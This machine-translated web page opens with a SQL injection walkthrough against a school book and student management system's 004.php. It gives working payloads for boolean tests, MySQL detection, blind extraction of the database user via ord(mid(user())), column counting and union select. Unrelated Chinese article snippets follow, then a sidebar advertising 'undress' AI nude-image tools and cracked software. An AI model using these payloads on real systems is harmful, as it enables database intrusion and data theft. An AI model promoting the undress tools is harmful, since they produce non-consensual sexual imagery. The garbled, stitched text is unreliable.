A program written by an external teacher of the school, book + student management system, file names 001.php, 002.php, 003.php... (named after B) The problem lies in the line 004.php I forgot too,
Pay attention to this sentence, ts_id has no filtering and is waiting for us to abuse it, HOO~ (Although I know all the information about the database, I still want to do a black box test here)
LET' S GO~
http://localhost/zhd/004.php?ts_id=1 and 1=1 Normal
http://localhost/zhd/004.php?ts_id=1 and 1=2 Abnormal
Idiot injection
Judge database:
Submit http://localhost/zhd/004.php?ts_id=1/*fenggou
Return normally, indicating that the database supports /*Comment, what database supports/* Woolen cloth? MYSQL!
Read username:
Submit http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=114/*
Return normally , user() is a built-in function of MYSQL, used to view users. Here is the first character of a user name. Yes, 114 is the "r" in ACCSLL. I am connected as root, so the statement is true (this trick Teach me your humble heart) But if the username is rijnc, am I not being cheated? So when submitting
http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=111/* o
http://localhost/zhd /004.php?ts_id=1 and ord(mid(user(),1,1))=111/* o
http://localhost/zhd/004.php?ts_id=1 and ord(mid( user(),1,1))=116/* t
But if the password is rootrijnc, then I am speechless...
Judge the number of fields:
Submit http://localhost/zhd/004.php? ts_id=1 order by 10/*
failed, indicating that the number of fields is less than 10. Try until statement 7 is established. There are 7 fields in total. This will bring great convenience to our future joint queries. Here is a little trick: First 5, then 10, then 15, and then narrow the range little by little
Union query:
Once you know the number of fields, submit it directly http://localhost/zhd/004.php?ts_id=1 union select 1,2, 3,4,5,6,7/*
Return normally, indicating that union is supported. Change the statement and use and 1=2 to let it display the error. Hehe~~~
Submit http://localhost/ zhd/004.php?ts_id=1 and 1=2 union select 1,2,3,4,5,6,7/*
最简便的硬盘序列号查询方式Feb 26, 2024 pm 02:24 PM硬盘序列号是硬盘的一个重要标识,通常用于唯一标识硬盘以及进行硬件识别。在某些情况下,我们可能需要查询硬盘序列号,比如在安装操作系统、查找正确设备驱动程序或进行硬盘维修等情况下。本文将介绍一些简单的方法,帮助大家查询硬盘序列号。方法一:使用Windows命令提示符打开命令提示符。在Windows系统中,按下Win+R键,输入"cmd"并按下回车键即可打开命
如何通过PHP编写一个简单的在线预约系统Sep 26, 2023 pm 09:55 PM如何通过PHP编写一个简单的在线预约系统随着互联网的普及和用户对便利性的追求,在线预约系统越来越受到欢迎。无论是餐厅、医院、美容院还是其他服务行业,都可以通过一个简单的在线预约系统来提高效率并为用户提供更好的服务体验。本文将介绍如何使用PHP编写一个简单的在线预约系统,并提供具体的代码示例。创建数据库和表格首先,我们需要创建一个数据库来存储预约信息。在MyS
如何使用Java编写一个简单的学生成绩报表生成器?Nov 03, 2023 pm 02:57 PM如何使用Java编写一个简单的学生成绩报表生成器?学生成绩报表生成器是一个可以帮助老师或教育者快速生成学生成绩报告的工具。本文将介绍如何使用Java编写一个简单的学生成绩报表生成器。首先,我们需要定义学生对象和学生成绩对象。学生对象包含学生的姓名、学号等基本信息,而学生成绩对象则包含学生的科目成绩和平均成绩等信息。以下是一个简单的学生对象的定义:public
快速入门:使用Go语言函数实现简单的图书管理系统Jul 30, 2023 am 09:18 AM快速入门:使用Go语言函数实现简单的图书管理系统引言:随着计算机科学领域的不断发展,软件应用的需求也越来越多样化。图书管理系统作为一种常见的管理工具,也成为很多图书馆、学校和企业必备的系统之一。在本文中,我们将使用Go语言函数来实现一个简单的图书管理系统。通过这个例子,读者可以学习到Go语言中函数的基本用法以及如何构建一个实用的程序。一、设计思路:我们首先来
如何通过C++编写一个简单的音乐推荐系统?Nov 03, 2023 pm 06:45 PM如何通过C++编写一个简单的音乐推荐系统?引言:音乐推荐系统是现代信息技术的一个研究热点,它可以根据用户的音乐偏好和行为习惯,向用户推荐符合其口味的歌曲。本文将介绍如何使用C++编写一个简单的音乐推荐系统。一、收集用户数据首先,我们需要收集用户的音乐偏好数据。可以通过在线调查、问卷调查等方式来获得用户对不同类型音乐的喜好程度。将数据保存在一个文本文件或数据库
php怎么设置implode没有分隔符Apr 18, 2022 pm 05:39 PM在PHP中,可以利用implode()函数的第一个参数来设置没有分隔符,该函数的第一个参数用于规定数组元素之间放置的内容,默认是空字符串,也可将第一个参数设置为空,语法为“implode(数组)”或者“implode("",数组)”。
如何使用PHP开发简单的文件管理功能Sep 20, 2023 pm 01:09 PM如何使用PHP开发简单的文件管理功能简介:文件管理功能在很多Web应用中都是必不可少的一部分。它允许用户上传、下载、删除和展示文件,为用户提供了便捷的文件管理方式。本文将介绍如何使用PHP开发一个简单的文件管理功能,并提供具体的代码示例。一、创建项目首先,我们需要创建一个基本的PHP项目。在项目目录下创建以下文件:index.php:主页面,用于显示上传表
如何使用PHP编写一个简单的网络爬虫Jun 14, 2023 am 08:21 AM网络爬虫是一种自动化程序,能够自动访问网站并抓取其中的信息。这种技术在如今的互联网世界中越来越常见,被广泛应用于数据挖掘、搜索引擎、社交媒体分析等领域。如果你想了解如何使用PHP编写简单的网络爬虫,本文将会为你提供基本的指导和建议。首先,需要了解一些基本的概念和技术。爬取目标在编写爬虫之前,需要选择爬取的目标。这可以是一个特定的网站、一个特定的网页、或整个互
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
VSCode Windows 64-bit Download
A free and powerful IDE editor launched by Microsoft
SublimeText3 Mac version
God-level code editing software (SublimeText3)
EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function
MantisBT
Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.
mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),
